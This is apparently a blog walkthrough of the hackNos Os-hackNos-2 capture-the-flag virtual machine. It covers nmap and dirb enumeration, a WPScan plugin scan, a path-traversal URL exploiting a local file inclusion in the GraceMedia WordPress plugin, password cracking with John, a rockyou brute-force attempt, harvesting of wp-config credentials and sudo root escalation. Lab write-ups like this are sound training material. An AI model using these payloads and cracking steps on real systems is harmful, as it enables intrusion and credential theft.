Hack Nos

2 Flag first user And second root, learning: exploit, Web Application, Enumeration, Privilege Escalation - www.hackNos.com. Format: Virtual Machine (Virtualbox - OVA). Operating System: Linux. Date release: 27 Nov 2019

URL: mhz_cxf: c1f

Difficulty: Easy

Author: hackNos: Os-hackNos

Enumeration

Set up the Machine with a host-only adapter and run a net discover command to find the associated IP. My interface eth1 is Host-Only on my main OS (Kali Linux).

netdiscover -i eth1

net

We can identify the machine with the IP 192.168.56.117, so we will scan it for open ports with nmap to a file named “nmap” with the following command:

nmap -sS -p- -A -o "nmap" 192.168.56.117

To start, port 80 is open so we will investigate this port with a browser.

apache

There is not much to see, this is the default Apache web page meaning there is probably another web page we are not seeing.

Let’s run a dirb scan to discover more paths we can further enumerate with the following command:

dirb http://192.168.56.117/ 

dirb

One of the results that have been returned is /tsweb so let’s see what is on there:

tsweb

This is clearly a Wordpress site so let’s run a scan with WPScan. Please note, the newer version of WPScan requires an API token to view the vulnerabilities you can get from their website.

The following command will scan the site and hopefully return any users, vulnerable plugins and vulnerable themes:

wpscan wpscan --url http://192.168.56.117/tsweb/ -e u,vp,vt 

wpscan users

We have found a user called “user”. This is worth noting.

We have also identified a vulnerable plugin called gracemedia-media-player which is susceptible to LFI.

vp

The exploit:

Title: GraceMedia Media Player 1.0 - Local File Inclusion (LFI)

require_once($_GET['cfg']); The parameter "cfg" it is not sanitized allowing include local files on /gracemedia-media-player/templates/files/ajax_controller.php

A link to the exploit DB page: ExploitDB

LFI is usually an exploit for attackers with authenticated access, meaning we need to be authenticated as a user or admin for this Wordpress site.

Initially, I tried brute-forcing the password since Wordpress has an easy brute-force function with the following command:

wpscan --url http://192.168.56.117/tsweb --passwords /usr/share/wordlists/rockyou.txt --usernames user

This would essentially use the rockyou.txt wordlist against the username “user” to see if any would work.

This did not work, so I tried to look into the /etc/passwd directory with Path Traversal. Read more about this on OWASP.

This was also given in the POC (Proof of Concept) in the exploit.

Visiting the following URL allows us to view the passwd file of the system:

 http://192.168.56.117/tsweb/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd 

passwd

This is to further investigate. Flag is a user with a hash value associated with it.

$1$flag$vqjCxzjtRc7PofLYS2lWf/

Let’s try and crack this md5 hash. I added this hash to a file named “hash” and asked John to crack it.

echo "$1$flag$vqjCxzjtRc7PofLYS2lWf" > hash
john --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt-long hash

john

We got a password!

topsecret

Let’s try ssh into the machine with the following command:

ssh [email protected]

ssh

We are logged in as flag.

Privilege Escalation

The change directory command is restricted so we will have to use ls to discover what is on the system.

cd

I checked the Wordpress config file and found database credentials worth noting:

cat var/www/html/tsweb/wp-config.php

config

Some more enumeration on the system reveals something interesting in the backup directory:

ls -la /var/backups/passbkp

backup

Let’s crack this md5 hash like before. Again I save it to a file called hash.

john --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt hash

And the following password has been found:

!%hack41

We will try ssh into another user called Rohit. This user was identified from the /home directory.

ssh [email protected]

Let’s check sudo Privileges:

sudo -l

Rohit clearly has all sudo privileges, so running the following command should give us root:

sudo /bin/bash

And we have root!

id
cd /root
ls

sudo

Written on May 21, 2020